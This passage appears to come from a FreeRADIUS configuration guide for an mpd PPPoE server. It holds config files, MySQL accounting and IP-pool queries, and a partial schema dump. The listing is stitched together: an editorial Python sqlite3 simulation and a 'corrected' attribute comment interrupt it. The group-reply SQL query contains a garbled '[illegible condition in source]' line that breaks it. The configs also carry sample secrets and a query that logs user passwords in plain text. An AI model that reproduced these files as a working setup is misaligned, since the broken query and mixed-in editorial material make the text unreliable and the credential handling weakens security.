	nastype = other
}

#eof

# vi /usr/local/etc/raddb/dictionary
$INCLUDE /usr/local/share/freeradius/dictionary
$INCLUDE /usr/local/share/freeradius/dictionary.mpd

#eof

# vi /usr/local/share/freeradius/dictionary.mpd
#
# dictionary.mpd
#
VENDOR mpd 12341
BEGIN-VENDOR mpd

ATTRIBUTE mpd-rule              1   string
ATTRIBUTE mpd-pipe              2   string
ATTRIBUTE mpd-queue             3   string
ATTRIBUTE mpd-table             4   string
ATTRIBUTE mpd-table-static      5   string
ATTRIBUTE mpd-filter            6   string
ATTRIBUTE mpd-limit             7   string
ATTRIBUTE mpd-input-octets      8   string
ATTRIBUTE mpd-input-packets     9   string
ATTRIBUTE mpd-output-octets     10  string
ATTRIBUTE mpd-output-packets    11  string
ATTRIBUTE mpd-link              12  string
ATTRIBUTE mpd-bundle            13  string
ATTRIBUTE mpd-iface             14  string
ATTRIBUTE mpd-iface-index       15  integer
ATTRIBUTE mpd-input-acct        16  string
ATTRIBUTE mpd-output-acct       17  string
ATTRIBUTE mpd-action            18  string
ATTRIBUTE mpd-peer-ident        19  string
ATTRIBUTE mpd-iface-name        20  string
ATTRIBUTE mpd-iface-descr       21  string
ATTRIBUTE mpd-iface-group       22  string
ATTRIBUTE mpd-drop-user         154 integer
END-VENDOR mpd

#eof


# vi /usr/local/etc/raddb/radiusd.conf
prefix = /usr/local
exec_prefix = ${prefix}
sysconfdir = ${prefix}/etc
localstatedir = /var
sbindir = ${exec_prefix}/sbin
logdir = /var/log
raddbdir = ${sysconfdir}/raddb
radacctdir = ${logdir}/radacct

name = radiusd

confdir = ${raddbdir}
run_dir = ${localstatedir}/run/${name}
db_dir = ${raddbdir}
libdir = /usr/local/lib/freeradius-2.2.4
pidfile = ${run_dir}/${name}.pid

user = freeradius
group = freeradius

max_request_time = 30
cleanup_delay = 5
max_requests = 12800

listen {
	type = auth
	ipaddr = 198.51.100.2
	port = 0
}
listen {
	ipaddr = 198.51.100.2
	port = 0
	type = acct
}
hostname_lookups = no
allow_core_dumps = no

regular_expressions = yes
extended_expressions = yes

log {
	destination = files
	file = ${logdir}/radius.log
	syslog_facility = daemon
	stripped_names = no
	auth = yes
	auth_badpass = yes
	auth_goodpass = no
}

checkrad = ${sbindir}/checkrad

security {
	max_attributes = 200
	reject_delay = 1
	status_server = yes
}

proxy_requests = yes
$INCLUDE proxy.conf

$INCLUDE clients.conf

thread pool {
	start_servers = 5
	max_servers = 32
	min_spare_servers = 3
	max_spare_servers = 10
	max_requests_per_server = 0
}

modules {
	$INCLUDE ${confdir}/modules/
	$INCLUDE eap.conf
	$INCLUDE sql.conf
	$INCLUDE sqlippool.conf
}

instantiate {
	exec
	expr
	expiration
	logintime
}
$INCLUDE policy.conf

$INCLUDE sites-enabled/

#eof


# vi /usr/local/etc/raddb/sqlippool.conf
sqlippool {
	sql-instance-name = "sql"
	ippool_table = "radippool"
	lease-duration = 360
	pool-key = "%{NAS-Port}"
	$INCLUDE sql/mysql/ippool.conf

	sqlippool_log_exists = "Existing IP: %{reply:Framed-IP-Address} \
	(did %{Called-Station-Id} cli %{Calling-Station-Id} port %{NAS-Port} user %{User-Name})"

	sqlippool_log_success = "Allocated IP: %{reply:Framed-IP-Address} from %{control:Pool-Name} \
	(did %{Called-Station-Id} cli %{Calling-Station-Id} port %{NAS-Port} user %{User-Name})"

	sqlippool_log_clear = "Released IP %{Framed-IP-Address} \
	(did %{Called-Station-Id} cli %{Calling-Station-Id} user %{User-Name})"

	sqlippool_log_failed = "IP Allocation FAILED from %{control:Pool-Name} \
	(did %{Called-Station-Id} cli %{Calling-Station-Id} port %{NAS-Port} user %{User-Name})"

	sqlippool_log_nopool = "No Pool-Name defined \
	(did %{Called-Station-Id} cli %{Calling-Station-Id} port %{NAS-Port} user %{User-Name})"
}

#eof


# vi /usr/local/etc/raddb/sql.conf

sql {
        database = "mysql"
        driver = "rlm_sql_${database}"
        server = "localhost"
        login = "userradius"
        password = "senharadius"
        radius_db = "radius"
        acct_table1 = "radacct"
        acct_table2 = "radacct"
        postauth_table = "radpostauth"
        authcheck_table = "radcheck"
        authreply_table = "radreply"
        groupcheck_table = "radgroupcheck"
        groupreply_table = "radgroupreply"
        usergroup_table = "usergroup"
        read_groups = yes
        deletestalesessions = yes
        sqltrace = no
        sqltracefile = ${logdir}/sqltrace.sql
        num_sql_socks = 30
        connect_failure_retry_delay = 60
        lifetime = 0
        max_queries = 0
        nas_table = "nas"
        $INCLUDE sql/${database}/dialup.conf
}
#eof


# vi /usr/local/etc/raddb/eap.conf

eap {
        default_eap_type = md5
        timer_expire = 60
        ignore_unknown_eap_types = no
        cisco_accounting_username_bug = no
        max_sessions = 4096

        md5 {
        }
        leap {
        }
        gtc {
                auth_type = PAP
        }
        tls {
                certdir = ${confdir}/certs
                cadir = ${confdir}/certs
                private_key_password = whatever
                private_key_file = ${certdir}/server.pem
                certificate_file = ${certdir}/server.pem
                CA_file = ${cadir}/ca.pem
                dh_file = ${certdir}/dh
                random_file = ${certdir}/random
                CA_path = ${cadir}
                cipher_list = "DEFAULT"
                make_cert_command = "${certdir}/bootstrap"
                cache {
                        enable = no
                        lifetime = 24 # hours
                        max_entries = 255
                }
                verify {
                }
        }
        ttls {
                default_eap_type = md5
                copy_request_to_tunnel = no
                use_tunneled_reply = no
                virtual_server = "inner-tunnel"
        }
        peap {
                default_eap_type = mschapv2
                copy_request_to_tunnel = no
                use_tunneled_reply = no
                virtual_server = "inner-tunnel"
        }
        mschapv2 {
        }
}
#eof


# vi /usr/local/etc/raddb/proxy.conf

proxy server {
        default_fallback = no
}

home_server localhost {
        type = auth
        ipaddr = 127.0.0.1
        port = 1812
        secret = testing123
        require_message_authenticator = yes
        response_window = 20
        zombie_period = 40
        revive_interval = 120
        status_check = status-server
        check_interval = 30
        num_answers_to_alive = 3
        coa {
                irt = 2
                mrt = 16
                mrc = 5
                mrd = 30
        }
}

home_server_pool my_auth_failover {
        type = fail-over
        home_server = localhost
}

realm example.com {
        auth_pool = my_auth_failover
}

realm LOCAL {
}
#eof


# vi /usr/local/etc/raddb/policy.conf

policy {
        forbid_eap {
                if (EAP-Message) {
                        reject
                }
        }
        permit_only_eap {
                if (!EAP-Message) {
                        if (!"%{outer.request:EAP-Message}") {
                                reject
                        }
                }
        }
        deny_realms {
                if (User-Name =~ /@|\\/) {
                        reject
                }
        }
        do_not_respond {
                update control {
                        Response-Packet-Type := Do-Not-Respond
                }
                handled
        }
        cui_authorize {
                update request {
                        Chargeable-User-Identity:='\\000'
                }
        }
        cui_postauth {
                if (FreeRadius-Proxied-To == 127.0.0.1) {
                        if (outer.request:Chargeable-User-Identity) {
                                update outer.reply {
                                        Chargeable-User-Identity:="%{md5:%{config:cui_hash_key}%{User-Name}}"
                                }
                        }
                }
                else {
                        if (Chargeable-User-Identity) {
                                update reply {
                                        Chargeable-User-Identity:="%{md5:%{config:cui_hash_key}%{User-Name}}"
                                }
                        }
                }
        }
        cui_updatedb {
                if (reply:Chargeable-User-Identity) {
                        cui
                }
        }
        cui_accounting {
                if (!Chargeable-User-Identity) {
                        update control {
                                # attribute name corrected: the source reads "Chargable-User-Identity",
                                # which is not a dictionary attribute and would not parse
                                Chargeable-User-Identity := "%{cui: SELECT cui FROM cui WHERE clientipaddress = '%{Client-IP-Address}' AND callingstationid = '%{Calling-Station-Id}' AND username = '%{User-Name}'}"
                        }
                }
                if (Chargeable-User-Identity && (Chargeable-User-Identity != "")) {
                        cui
                }
        }
}
#eof

# vi /usr/local/etc/raddb/sql/mysql/ippool.conf

allocate-clear = "UPDATE ${ippool_table} \
        SET nasipaddress = '', pool_key = 0, \
        callingstationid = '', username = '', \
        expiry_time = NULL \
        WHERE expiry_time <= NOW() - INTERVAL 1 SECOND \
        AND nasipaddress = '%{Nas-IP-Address}'"

allocate-find = "SELECT framedipaddress FROM ${ippool_table} \
        WHERE pool_name = '%{control:Pool-Name}' \
        ORDER BY (username <> '%{User-Name}'), \
        (callingstationid <> '%{Calling-Station-Id}'), \
        expiry_time \
        LIMIT 1 \
        FOR UPDATE"

pool-check = "SELECT id FROM ${ippool_table} \
        WHERE pool_name='%{control:Pool-Name}' LIMIT 1"

allocate-update = "UPDATE ${ippool_table} \
        SET nasipaddress = '%{NAS-IP-Address}', pool_key = '${pool-key}', \
        callingstationid = '%{Calling-Station-Id}', username = '%{User-Name}', \
        expiry_time = NOW() + INTERVAL ${lease-duration} SECOND \
        WHERE framedipaddress = '%I' AND expiry_time IS NULL"

start-update = "UPDATE ${ippool_table} \
        SET expiry_time = NOW() + INTERVAL ${lease-duration} SECOND \
        WHERE nasipaddress = '%{NAS-IP-Address}' AND pool_key = '${pool-key}' \
        AND username = '%{User-Name}' \
        AND callingstationid = '%{Calling-Station-Id}' \
        AND framedipaddress = '%{Framed-IP-Address}'"

stop-clear = "UPDATE ${ippool_table} \
        SET nasipaddress = '', pool_key = 0, callingstationid = '', \
        username = '', \
        expiry_time = NULL \
        WHERE nasipaddress = '%{Nas-IP-Address}' AND pool_key = '${pool-key}' \
        AND username = '%{User-Name}' \
        AND callingstationid = '%{Calling-Station-Id}' \
        AND framedipaddress = '%{Framed-IP-Address}'"

alive-update = "UPDATE ${ippool_table} \
        SET expiry_time = NOW() + INTERVAL ${lease-duration} SECOND \
        WHERE nasipaddress = '%{NAS-IP-Address}' AND pool_key = '${pool-key}' \
        AND username = '%{User-Name}' \
        AND callingstationid = '%{Calling-Station-Id}' \
        AND framedipaddress = '%{Framed-IP-Address}'"

on-clear = "UPDATE ${ippool_table} \
        SET nasipaddress = '', pool_key = 0, callingstationid = '', \
        username = '', \
        expiry_time = NULL \
        WHERE nasipaddress = '%{Nas-IP-Address}'"

off-clear = "UPDATE ${ippool_table} \
        SET nasipaddress = '', pool_key = 0, callingstationid = '', \
        username = '', \
        expiry_time = NULL \
        WHERE nasipaddress = '%{Nas-IP-Address}'"

#eof
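To see what the allocate-find ordering and the expiry_time conditions in ippool.conf actually do, here is a small sqlite3 simulation of the radippool lifecycle (allocate-clear, allocate-find, allocate-update, stop-clear). It is an added example, not FreeRADIUS or the author's code: the MySQL-only pieces (FOR UPDATE, NOW() + INTERVAL, the %I substitution and the %{...} expansions) are replaced by Python parameters, and the pool addresses, NAS address, user names and clock are constructed.

```python
"""Simulation of the sqlippool queries above, rewritten for sqlite3 (added
example, not FreeRADIUS code).  Column names follow the page's radippool table."""
import sqlite3
from datetime import datetime, timedelta

LEASE_DURATION = 360      # seconds, the page's sqlippool.conf value
POOL_NAME = "main_pool"   # the Pool-Name the page's radreply hands out
NAS_IP = "192.0.2.1"      # constructed sample NAS address

SCHEMA = """
CREATE TABLE radippool (
  id               INTEGER PRIMARY KEY,
  pool_name        TEXT NOT NULL,
  framedipaddress  TEXT NOT NULL DEFAULT '',
  nasipaddress     TEXT NOT NULL DEFAULT '',
  calledstationid  TEXT NOT NULL DEFAULT '',
  -- the page's schema allows NULL here; NULL <> 'x' is NULL, which ORDER BY
  -- sorts first, so this simulation seeds '' to keep the comparison boolean
  callingstationid TEXT NOT NULL DEFAULT '',
  expiry_time      TEXT,
  username         TEXT NOT NULL DEFAULT '',
  pool_key         TEXT NOT NULL DEFAULT '0'
)"""
SAMPLE_ADDRESSES = ["192.0.2.21", "192.0.2.22", "192.0.2.23"]   # constructed pool


def new_pool():
    """Create an in-memory radippool with three free addresses."""
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    db.executemany(
        "INSERT INTO radippool (pool_name, framedipaddress) VALUES (?, ?)",
        [(POOL_NAME, ip) for ip in SAMPLE_ADDRESSES])
    return db


def allocate_clear(db, now):
    """allocate-clear: wipe leases on this NAS that expired at least 1 s ago."""
    cutoff = (now - timedelta(seconds=1)).isoformat()
    db.execute("""UPDATE radippool
                  SET nasipaddress = '', pool_key = '0', callingstationid = '',
                      username = '', expiry_time = NULL
                  WHERE expiry_time <= ? AND nasipaddress = ?""", (cutoff, NAS_IP))


def allocate(db, pool_key, username, calling_station, now):
    """allocate-find followed by allocate-update.

    The ORDER BY is the page's: a row whose username matches sorts first
    (0 before 1), then a matching Calling-Station-Id, then the oldest expiry
    (NULL, i.e. never leased, first).  Returns (ip, refreshed); refreshed says
    whether allocate-update actually touched the row."""
    row = db.execute("""SELECT framedipaddress FROM radippool
                        WHERE pool_name = ?
                        ORDER BY (username <> ?), (callingstationid <> ?), expiry_time
                        LIMIT 1""", (POOL_NAME, username, calling_station)).fetchone()
    if row is None:
        return None, False
    ip = row[0]
    expiry = (now + timedelta(seconds=LEASE_DURATION)).isoformat()
    # The page's allocate-update only matches a row with no live lease, so a
    # sticky re-allocation of a still-leased row hands back the IP without
    # extending the lease; the start-update / alive-update queries do that.
    cur = db.execute("""UPDATE radippool
                        SET nasipaddress = ?, pool_key = ?, callingstationid = ?,
                            username = ?, expiry_time = ?
                        WHERE framedipaddress = ? AND expiry_time IS NULL""",
                     (NAS_IP, pool_key, calling_station, username, expiry, ip))
    return ip, cur.rowcount == 1


def stop_clear(db, pool_key, username, calling_station, ip):
    """stop-clear on Accounting-Stop: release exactly this session's lease."""
    cur = db.execute("""UPDATE radippool
                        SET nasipaddress = '', pool_key = '0', callingstationid = '',
                            username = '', expiry_time = NULL
                        WHERE nasipaddress = ? AND pool_key = ? AND username = ?
                          AND callingstationid = ? AND framedipaddress = ?""",
                     (NAS_IP, pool_key, username, calling_station, ip))
    return cur.rowcount


def free_addresses(db):
    """Addresses with no lease, in table order."""
    return [r[0] for r in db.execute(
        "SELECT framedipaddress FROM radippool WHERE expiry_time IS NULL ORDER BY id")]


def demo():
    """Walk one PPPoE session lifecycle and return the observations."""
    db = new_pool()
    t0 = datetime(2014, 10, 20, 22, 0, 0)               # constructed clock
    ip_a, _ = allocate(db, "1", "alice", "aa:aa:aa", t0)
    ip_b, _ = allocate(db, "2", "bob", "bb:bb:bb", t0)
    # the NAS dropped alice without an Accounting-Stop; she reconnects 10 s later
    allocate_clear(db, t0 + timedelta(seconds=10))
    ip_a2, refreshed = allocate(db, "3", "alice", "aa:aa:aa", t0 + timedelta(seconds=10))
    stop_clear(db, "1", "alice", "aa:aa:aa", ip_a)       # the original session's stop
    # bob's lease (t0 + 360 s) has expired by t0 + 400 s: allocate-clear frees it
    allocate_clear(db, t0 + timedelta(seconds=400))
    return {"ip_a": ip_a, "ip_b": ip_b, "ip_a2": ip_a2,
            "refreshed": refreshed, "free": free_addresses(db)}


if __name__ == "__main__":
    print(demo())
```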
# vi /usr/local/etc/raddb/sql/mysql/dialup.conf

sql_user_name = "%{User-Name}"

nas_query = "SELECT id, nasname, shortname, type, \
        secret, server FROM ${nas_table}"

authorize_check_query = "SELECT id, username, attribute, \
        value, op \
        FROM ${authcheck_table} \
        WHERE username = '%{SQL-User-Name}' \
        ORDER BY id"

authorize_reply_query = "SELECT id, username, attribute, \
        value, op \
        FROM ${authreply_table} \
        WHERE username = '%{SQL-User-Name}' AND attribute <> 'Garantia' \
        ORDER BY id"

group_membership_query = "SELECT trim(groupname) as groupname \
        FROM ${usergroup_table} \
        WHERE username = '%{SQL-User-Name}' \
        ORDER BY priority"

authorize_group_check_query = "SELECT id, \
        trim(groupname) as groupname, attribute, \
        Value, op \
        FROM ${groupcheck_table} \
        WHERE trim(groupname) = trim('%{Sql-Group}') \
        ORDER BY id"

authorize_group_reply_query = "SELECT id, \
        trim(groupname) as groupname, attribute, \
        value, op \
        FROM ${groupreply_table} \
        WHERE trim(groupname) = trim('%{Sql-Group}') \
        [illegible condition in source: "BiG bwlolvem <M yeloeme cee a."] \
        ORDER BY id"

accounting_onoff_query = "\
        UPDATE ${acct_table1} \
        SET \
        acctstoptime = '%S', \
        acctsessiontime = unix_timestamp('%S') - \
                unix_timestamp(acctstarttime), \
        acctterminatecause = '%{Acct-Terminate-Cause}', \
        acctstopdelay = %{%{Acct-Delay-Time}:-0} \
        WHERE acctstoptime IS NULL \
        AND nasipaddress = '%{NAS-IP-Address}' \
        AND acctstarttime <= '%S'"

accounting_update_query = " \
        UPDATE ${acct_table1} \
        SET \
        framedipaddress = '%{Framed-IP-Address}', \
        acctsessiontime = '%{Acct-Session-Time}', \
        acctinputoctets = '%{%{Acct-Input-Gigawords}:-0}' << 32 | \
                '%{%{Acct-Input-Octets}:-0}', \
        acctoutputoctets = '%{%{Acct-Output-Gigawords}:-0}' << 32 | \
                '%{%{Acct-Output-Octets}:-0}' \
        WHERE acctsessionid = '%{Acct-Session-Id}' \
        AND username = '%{SQL-User-Name}' \
        AND nasipaddress = '%{NAS-IP-Address}'"

accounting_update_query_alt = " \
        INSERT INTO ${acct_table1} \
        (acctsessionid, acctuniqueid, username, \
        realm, nasipaddress, nasportid, \
        nasporttype, acctstarttime, acctsessiontime, \
        acctauthentic, connectinfo_start, acctinputoctets, \
        acctoutputoctets, calledstationid, callingstationid, \
        servicetype, framedprotocol, framedipaddress, \
        acctstartdelay, xascendsessionsvrkey) \
        VALUES \
        ('%{Acct-Session-Id}', '%{Acct-Unique-Session-Id}', \
        '%{SQL-User-Name}', \
        '%{Realm}', '%{NAS-IP-Address}', '%{NAS-Port}', \
        '%{NAS-Port-Type}', \
        DATE_SUB('%S', \
                INTERVAL (%{%{Acct-Session-Time}:-0} + \
                %{%{Acct-Delay-Time}:-0}) SECOND), \
        '%{Acct-Session-Time}', \
        '%{Acct-Authentic}', '', \
        '%{%{Acct-Input-Gigawords}:-0}' << 32 | \
        '%{%{Acct-Input-Octets}:-0}', \
        '%{%{Acct-Output-Gigawords}:-0}' << 32 | \
        '%{%{Acct-Output-Octets}:-0}', \
        '%{Called-Station-Id}', '%{Calling-Station-Id}', \
        '%{Service-Type}', '%{Framed-Protocol}', \
        '%{Framed-IP-Address}', \
        '0', '%{X-Ascend-Session-Svr-Key}')"

accounting_start_query = " \
        INSERT INTO ${acct_table1} \
        (acctsessionid, acctuniqueid, username, \
        realm, nasipaddress, nasportid, \
        nasporttype, acctstarttime, acctstoptime, \
        acctsessiontime, acctauthentic, connectinfo_start, \
        connectinfo_stop, acctinputoctets, acctoutputoctets, \
        calledstationid, callingstationid, acctterminatecause, \
        servicetype, framedprotocol, framedipaddress, \
        acctstartdelay, acctstopdelay, xascendsessionsvrkey) \
        VALUES \
        ('%{Acct-Session-Id}', '%{Acct-Unique-Session-Id}', \
        '%{SQL-User-Name}', \
        '%{Realm}', '%{NAS-IP-Address}', '%{NAS-Port}', \
        '%{NAS-Port-Type}', '%S', NULL, \
        '0', '%{Acct-Authentic}', '%{Connect-Info}', \
        '', '0', '0', \
        '%{Called-Station-Id}', '%{Calling-Station-Id}', '', \
        '%{Service-Type}', '%{Framed-Protocol}', '%{Framed-IP-Address}', \
        '%{%{Acct-Delay-Time}:-0}', '0', '%{X-Ascend-Session-Svr-Key}')"

accounting_start_query_alt = " \
        UPDATE ${acct_table1} SET \
        acctstarttime = '%S', \
        acctstartdelay = '%{%{Acct-Delay-Time}:-0}', \
        connectinfo_start = '%{Connect-Info}' \
        WHERE acctsessionid = '%{Acct-Session-Id}' \
        AND username = '%{SQL-User-Name}' \
        AND nasipaddress = '%{NAS-IP-Address}'"

accounting_stop_query = " \
        UPDATE ${acct_table2} SET \
        acctstoptime = '%S', \
        acctsessiontime = '%{Acct-Session-Time}', \
        acctinputoctets = '%{%{Acct-Input-Gigawords}:-0}' << 32 | \
                '%{%{Acct-Input-Octets}:-0}', \
        acctoutputoctets = '%{%{Acct-Output-Gigawords}:-0}' << 32 | \
                '%{%{Acct-Output-Octets}:-0}', \
        acctterminatecause = '%{Acct-Terminate-Cause}', \
        acctstopdelay = '%{%{Acct-Delay-Time}:-0}', \
        connectinfo_stop = '%{Connect-Info}' \
        WHERE acctsessionid = '%{Acct-Session-Id}' \
        AND username = '%{SQL-User-Name}' \
        AND nasipaddress = '%{NAS-IP-Address}'"

accounting_stop_query_alt = " \
        INSERT INTO ${acct_table2} \
        (acctsessionid, acctuniqueid, username, \
        realm, nasipaddress, nasportid, \
        nasporttype, acctstarttime, acctstoptime, \
        acctsessiontime, acctauthentic, connectinfo_start, \
        connectinfo_stop, acctinputoctets, acctoutputoctets, \
        calledstationid, callingstationid, acctterminatecause, \
        servicetype,  framedprotocol, framedipaddress, \
        acctstartdelay, acctstopdelay) \
        VALUES \
        ('%{Acct-Session-Id}', '%{Acct-Unique-Session-Id}', \
        '%{SQL-User-Name}', \
        '%{Realm}', '%{NAS-IP-Address}', '%{NAS-Port}', \
        '%{NAS-Port-Type}', \
        DATE_SUB('%S', \
                INTERVAL (%{%{Acct-Session-Time}:-0} + \
                %{%{Acct-Delay-Time}:-0}) SECOND), \
        '%S', '%{Acct-Session-Time}', '%{Acct-Authentic}', '', \
        '%{Connect-Info}', \
        '%{%{Acct-Input-Gigawords}:-0}' << 32 | \
        '%{%{Acct-Input-Octets}:-0}', \
        '%{%{Acct-Output-Gigawords}:-0}' << 32 | \
        '%{%{Acct-Output-Octets}:-0}', \
        '%{Called-Station-Id}', '%{Calling-Station-Id}', \
        '%{Acct-Terminate-Cause}', \
        '%{Service-Type}', '%{Framed-Protocol}', '%{Framed-IP-Address}', \
        '0', '%{%{Acct-Delay-Time}:-0}')"

simul_count_query = "SELECT COUNT(*) \
        FROM ${acct_table1} \
        WHERE username = '%{SQL-User-Name}' \
        AND acctstoptime IS NULL"

simul_verify_query = "SELECT radacctid, acctsessionid, username, \
        nasipaddress, nasportid, framedipaddress, \
        callingstationid, framedprotocol \
        FROM ${acct_table1} \
        WHERE username = '%{SQL-User-Name}' \
        AND acctstoptime IS NULL"

postauth_query = "INSERT INTO ${postauth_table} \
        (username, pass, reply, authdate) \
        VALUES ( \
        '%{User-Name}', \
        '%{%{User-Password}:-%{Chap-Password}}', \
        '%{reply:Packet-Type}', '%S')"
#eof


# /usr/local/etc/raddb/sites-enabled/control-socket
listen {
        type = control
        socket = ${run_dir}/${name}.sock
}
#eof


# /usr/local/etc/raddb/sites-enabled/inner-tunnel

server inner-tunnel {
        listen {
                ipaddr = 127.0.0.1
                port = 18120
                type = auth
        }
        authorize {
                chap
                mschap
                suffix
                update control {
                        Proxy-To-Realm := LOCAL
                }
                eap {
                        ok = return
                }
                files
                expiration
                logintime
                pap
        }
        authenticate {
                Auth-Type PAP {
                        pap
                }
                Auth-Type CHAP {
                        chap
                }
                Auth-Type MS-CHAP {
                        mschap
                }
                unix
                eap
        }
        session {
                radutmp
        }
        post-auth {
                Post-Auth-Type REJECT {
                        attr_filter.access_reject
                }
        }
        pre-proxy {
        }
        post-proxy {
                eap
        }
}
#eof


# /usr/local/etc/raddb/sites-enabled/default
authorize {
        preprocess
        chap
        mschap
        sql
        expiration
        logintime
        pap
}
authenticate {
        Auth-Type PAP {
                pap
        }
        Auth-Type CHAP {
                chap
        }
        Auth-Type MS-CHAP {
                mschap
        }
        digest
}
preacct {
        preprocess
        acct_unique
        suffix
        files
}
accounting {
        detail
        sql
        exec
        attr_filter.accounting_response
        sqlippool
}
session {
        sql
}
post-auth {
        exec
        Post-Auth-Type REJECT {
                attr_filter.access_reject
        }
        sqlippool
}
pre-proxy {
}
post-proxy {
        eap
}
#eof
Listing 9.

# cat radius_nodata.sql

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `nas`
--

DROP TABLE IF EXISTS `nas`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `nas` (
  `id` int(10) NOT NULL AUTO_INCREMENT,
  `nasname` varchar(128) NOT NULL,
  `shortname` varchar(32) DEFAULT NULL,
  `type` varchar(30) DEFAULT 'other',
  `ports` int(5) DEFAULT NULL,
  `secret` varchar(60) NOT NULL DEFAULT 'secret',
  `community` varchar(50) DEFAULT NULL,
  `description` varchar(200) DEFAULT 'RADIUS Client',
  PRIMARY KEY (`id`),
  KEY `nasname` (`nasname`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Table structure for table `radacct`
--

DROP TABLE IF EXISTS `radacct`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `radacct` (
  `RadAcctId` bigint(21) NOT NULL AUTO_INCREMENT,
  `AcctSessionId` varchar(32) NOT NULL DEFAULT '',
  `AcctUniqueId` varchar(32) NOT NULL DEFAULT '',
  `UserName` varchar(64) NOT NULL DEFAULT '',
  `Realm` varchar(64) DEFAULT '',
  `NASIPAddress` varchar(15) NOT NULL DEFAULT '',
  `NASPortId` varchar(15) DEFAULT NULL,
  `NASPortType` varchar(32) DEFAULT NULL,
  `AcctStartTime` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `acctstoptime` datetime DEFAULT NULL,
  `AcctSessionTime` int(12) DEFAULT NULL,
  `AcctAuthentic` varchar(32) DEFAULT NULL,
  `ConnectInfo_start` varchar(50) DEFAULT NULL,
  `ConnectInfo_stop` varchar(50) DEFAULT NULL,
  `AcctInputOctets` bigint(12) DEFAULT NULL,
  `AcctOutputOctets` bigint(12) DEFAULT NULL,
  `CalledStationId` varchar(50) NOT NULL DEFAULT '',
  `CallingStationId` varchar(50) NOT NULL DEFAULT '',
  `AcctTerminateCause` varchar(32) NOT NULL DEFAULT '',
  `ServiceType` varchar(32) DEFAULT NULL,
  `FramedProtocol` varchar(32) DEFAULT NULL,
  `FramedIPAddress` varchar(15) NOT NULL DEFAULT '',
  `AcctStartDelay` int(12) DEFAULT NULL,
  `AcctStopDelay` int(12) DEFAULT NULL,
  `xascendsessionsvrkey` varchar(10) DEFAULT NULL,
  PRIMARY KEY (`RadAcctId`),
  KEY `UserName` (`UserName`),
  KEY `FramedIPAddress` (`FramedIPAddress`),
  KEY `AcctSessionId` (`AcctSessionId`),
  KEY `AcctUniqueId` (`AcctUniqueId`),
  KEY `AcctStartTime` (`AcctStartTime`),
  KEY `AcctStopTime` (`acctstoptime`),
  KEY `NASIPAddress` (`NASIPAddress`)
) ENGINE=InnoDB AUTO_INCREMENT=22301255 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Table structure for table `radcheck`
--

DROP TABLE IF EXISTS `radcheck`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `radcheck` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `UserName` varchar(64) NOT NULL DEFAULT '',
  `Attribute` varchar(32) NOT NULL DEFAULT '',
  `op` char(2) NOT NULL DEFAULT '==',
  `Value` varchar(253) NOT NULL DEFAULT '',
  `Bloqueado` tinyint(1) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `UserName` (`UserName`(32))
) ENGINE=MyISAM AUTO_INCREMENT=20876 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Table structure for table `radgroupcheck`
--

DROP TABLE IF EXISTS `radgroupcheck`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `radgroupcheck` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `GroupName` varchar(64) NOT NULL DEFAULT '',
  `Attribute` varchar(32) NOT NULL DEFAULT '',
  `op` char(2) NOT NULL DEFAULT '==',
  `Value` varchar(253) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `GroupName` (`GroupName`(32))
) ENGINE=MyISAM AUTO_INCREMENT=250 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Table structure for table `radgroupreply`
--

DROP TABLE IF EXISTS `radgroupreply`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `radgroupreply` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `GroupName` varchar(64) NOT NULL DEFAULT '',
  `Attribute` varchar(32) NOT NULL DEFAULT '',
  `op` char(2) NOT NULL DEFAULT '=',
  `Value` varchar(253) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `GroupName` (`GroupName`(32))
) ENGINE=MyISAM AUTO_INCREMENT=492 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Table structure for table `radippool`
--

DROP TABLE IF EXISTS `radippool`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `radippool` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `pool_name` varchar(30) NOT NULL,
  `framedipaddress` varchar(15) NOT NULL DEFAULT '',
  `nasipaddress` varchar(15) NOT NULL DEFAULT '',
  `calledstationid` varchar(30) NOT NULL,
  `callingstationid` varchar(60) DEFAULT NULL,
  `expiry_time` datetime DEFAULT NULL,
  `username` varchar(64) NOT NULL DEFAULT '',
